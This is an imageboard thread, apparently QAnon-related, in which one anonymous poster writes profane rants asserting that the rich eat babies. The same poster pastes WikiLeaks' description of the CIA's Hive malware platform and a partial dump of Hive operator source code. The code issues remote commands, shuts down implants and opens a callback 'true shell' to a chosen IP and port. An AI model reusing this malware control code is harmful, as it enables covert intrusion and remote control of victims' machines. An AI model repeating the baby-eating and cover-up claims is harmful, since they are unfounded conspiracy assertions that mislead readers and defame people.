Anonymous ID: 6e4988 June 6, 2020, 8:53 p.m. No.9514333   🗄️.is 🔗kun

So What we have here is the rich and/or powerful being so disconnected that even when you guys see a small part of it………This will not work in a way you guys think it will. Has anything you have seen show you that "they" will do anything,,,,,

 

It is real. But has anything happened…… The D day was shit…. These people are so boring that they think these drops are huge…

 

I followed becuase I know it is real before…. And even normies thought that the rich ate babies before Q…..So what is really going down beside jerking us off…………

 

Wiener got no time. Is out now… With millions.. He isn't hurting….. Epstein…. They let that happen…. Where are we… And this has been going on for longer than 3.5 years…………

Anonymous ID: 6e4988 June 6, 2020, 8:57 p.m. No.9514395   🗄️.is 🔗kun

>>9514340

>>9514340

Well I don't know what to tell you other than Epstein…. How did that work out… Wiener anyone that went to jail fucking a kids…. A few years at most????????? Come on man… Or are you new and don't know nothing

Anonymous ID: 6e4988 June 6, 2020, 9:24 p.m. No.9514794   🗄️.is 🔗kun   >>4801

Hive

9 November, 2017

 

Today, 9 November 2017, WikiLeaks publishes the source code and development logs to Hive, a major component of the CIA infrastructure to control its malware.

 

Hive solves a critical problem for the malware operators at the CIA. Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention. Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet. Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.

 

Hive can serve multiple operations using multiple implants on target computers. Each operation anonymously registers at least one cover domain (e.g. "perfectly-boring-looking-domain.com") for its own use. The server running the domain website is rented from commercial hosting providers as a VPS (virtual private server) and its software is customized according to CIA specifications. These servers are the public-facing side of the CIA back-end infrastructure and act as a relay for HTTP(S) traffic over a VPN connection to a "hidden" CIA server called 'Blot'.he cover domain delivers 'innocent' content if somebody browses it by chance. A visitor will not suspect that it is anything else but a normal website. The only peculiarity is not visible to non-technical users - a HTTPS server option that is not widely used: Optional Client Authentication. But Hive uses the uncommon Optional Client Authentication so that the user browsing the website is not required to authenticate - it is optional. But implants talking to Hive do authenticate themselves and can therefore be detected by the Blot server. Traffic from implants is sent to an implant operator management gateway called Honeycomb (see graphic above) while all other traffic go to a cover server that delivers the insuspicious content for all other users.

 

Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities. The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town. In this way, if the target organization looks at the network traffic coming out of its network, it is likely to misattribute the CIA exfiltration of data to uninvolved entities whose identities have been impersonated.

 

The documentation for Hive is available from the WikiLeaks Vault7 series

Anonymous ID: 6e4988 June 6, 2020, 9:25 p.m. No.9514801   🗄️.is 🔗kun   >>4808

>>9514794

#include <string.h

#include <stdio.h>

#include <iostream>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <unistd.h>

 

#include "LibraryModuleBase.h"

#include "Primitive.h"

#include "ProcessCmdResponse.h"

#include "Connection.h"

#include "Utilities.h"

#include "ilm-client.h"

#include "Command.h"

#include "hive.h"

#include "cryptcat.h"

 

extern "C" {

 

#include "debug.h"

#include "proj_strings.h"

#include "colors.h"

 

}

 

//*************

using namespace InterfaceLibrary;

using namespace InterfaceLibrary::Primitive;

 

//*************

extern Connection *myConn;

extern HiveILM *myILMInstance;

 

char cryptcat_path[] = "cryptcat";

 

//*************

void Command::Execute( Primitive::Activation& actvn, ProcessCmdAccumulator& , ProcessCmdResponse& resp )

{

struct send_buf sbuf;

struct recv_buf rbuf;

String argPtr = (String )(actvn.arguments);

String args = *argPtr++;

string command = args;

 

memset( &sbuf, 0, sizeof( struct send_buf ) );

memset( &rbuf, 0, sizeof( struct recv_buf ) );

 

resp.type = ProcessCmdResponse::TYPE_Pending;

 

strncat( sbuf.path, command.c_str(), 254 );

 

if ( myConn->TxCommand( &sbuf, &rbuf, EXECUTE ) < 0 )

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

resp.resultsLines.push_back( ProcessCmdResponse::Line( 0, " ! Error: Problem with or lost server connection." ) );

return;

}

 

if ( rbuf.reply == 0 )

{

resp.type = ProcessCmdResponse::TYPE_Success;

}

else

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

}

 

return;

}

 

//*************

void Command::Session( Primitive::Activation& actvn, ProcessCmdAccumulator&, ProcessCmdResponse& resp )

{

struct send_buf sbuf;

struct recv_buf rbuf;

String argPtr = (String )(actvn.arguments);

String args = *argPtr++;

string command = args;

 

memset( &sbuf, 0, sizeof( struct send_buf ) );

memset( &rbuf, 0, sizeof( struct recv_buf ) );

 

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

printf( " ! This feature is not implemented\n" );

return;

 

resp.type = ProcessCmdResponse::TYPE_Pending;

 

strncat( sbuf.path, command.c_str(), 254 );

 

if ( myConn->TxCommand( &sbuf, &rbuf, LAUNCHTRUESHELL ) < 0 )

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

resp.resultsLines.push_back( ProcessCmdResponse::Line( 0, " ! Error: Problem with or lost server connection." ) );

return;

}

 

if ( rbuf.reply == 0 )

{

resp.type = ProcessCmdResponse::TYPE_Success;

}

else

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

}

 

return;

}

 

//*************

void Command::Exit( Primitive::Activation&, ProcessCmdAccumulator&, ProcessCmdResponse& resp )

{

struct send_buf sbuf;

struct recv_buf rbuf;

 

memset( &sbuf, 0, sizeof( struct send_buf ) );

memset( &rbuf, 0, sizeof( struct recv_buf ) );

 

resp.type = ProcessCmdResponse::TYPE_Pending;

 

if ( myConn->TxCommand( &sbuf, &rbuf, EXIT ) < 0 )

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

resp.resultsLines.push_back( ProcessCmdResponse::Line( 0, " ! Error: Problem with or lost server connection." ) );

goto cleanup;

}

 

if ( rbuf.reply == 0 )

{

printf( " * Disconnected\n" );

resp.type = ProcessCmdResponse::TYPE_Success;

}

else

{

printf( " ! Unsuccessful\n" );

resp.type =

Anonymous ID: 6e4988 June 6, 2020, 9:25 p.m. No.9514808   🗄️.is 🔗kun   >>4826

>>9514801

ProcessCmdResponse::TYPE_Remote_Failure;

}

 

cleanup:

Utilities::SetCTStateDisconnected();

// myILMInstance->RemoveCmdShutDown();

myILMInstance->RemoveCustomCmds();

 

return;

}

 

//*************

Command::ShutDown::ShutDown() {

 

// cout << "Creating ShutDownCmd Object" << endl;

 

referenceID = 33;

setTitle("now");

helpText = "Task server to close open files, network connections, and terminate. Does not effect execution upon reboot.";

 

/ attributes required only if command requires arguments /

#if 0

CustomCommand::Attribute attribute ("string", 0 );

attribute.defaultValue = " ";

attribute.helpText = "Task implant to stop running and exit.";

attributes.push_back (attribute);

#endif

 

}

 

//*************

ProcessCmdResponse Command::ShutDown::Process(binary&)

{

ProcessCmdResponse resp;

struct send_buf sbuf;

struct recv_buf rbuf;

 

memset( &sbuf, 0, sizeof( struct send_buf ) );

memset( &rbuf, 0, sizeof( struct recv_buf ) );

 

// cout << "Processing Command::ShutDown" << endl;

 

resp.type = ProcessCmdResponse::TYPE_Pending;

 

if ( myConn->TxCommand( &sbuf, &rbuf, SHUTDOWNBOTH ) < 0 )

{

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

resp.resultsLines.push_back( ProcessCmdResponse::Line( 0, " ! Error: Problem with or lost server connection." ) );

goto cleanup;

}

 

if ( rbuf.reply == 0 )

{

printf( " * Shutdown and Disconnected\n" );

resp.type = ProcessCmdResponse::TYPE_Success;

}

else

{

printf( " ! Shutdown unsuccessful\n" );

resp.type = ProcessCmdResponse::TYPE_Remote_Failure;

}

 

cleanup:

Utilities::SetCTStateDisconnected();

// myILMInstance->RemoveCmdShutDown();

myILMInstance->RemoveCustomCmds();

 

return resp;

}

//*************

Command::LaunchTrueShell::LaunchTrueShell() {

 

// cout << "Creating ShutDownCmd Object" << endl;

 

referenceID = 34;

setTitle("open");

helpText = "Initiate shell connection with remote host.";

 

/ attributes required only if command requires arguments /

CustomCommand::Attribute attribute_ip ("string", 0 );

attribute_ip.defaultValue = " ";

attribute_ip.helpText = "Callback IP address.";

attributes.push_back (attribute_ip);

 

CustomCommand::Attribute attribute_port ("string", 0 );

attribute_port.defaultValue = "";

attribute_port.helpText = "Callback TCP port number.";

attributes.push_back (attribute_port);

 

CustomCommand::Attribute attribute_password ("string", 0 );

attribute_password.defaultValue = "";

attribute_password.helpText = "Password to initialize shell session encryption.";

attributes.push_back (attribute_password);

 

}

 

//*************

ProcessCmdResponse Command::LaunchTrueShell::Process(binary& arguments)

{

ProcessCmdResponse resp;

struct send_buf sbuf;

struct recv_buf rbuf;

int fd;

int rv = 0;

Anonymous ID: 6e4988 June 6, 2020, 9:34 p.m. No.9514906   🗄️.is 🔗kun

>>9514883

LOL you are so mind fucked you think we are all shill…. Or pissed of people that kniw it is true and see nothing being done….. Get over yourself fart sniffer…

Anonymous ID: 6e4988 June 6, 2020, 9:41 p.m. No.9514959   🗄️.is 🔗kun

>>9514919

They worked so hard and still people thought that all rich people ate babies….. The problem is the system…. Are you in that system…… You can't do jack shit. No post can change that. The News is for them not you. They think we are stupid and only fear us in large numbers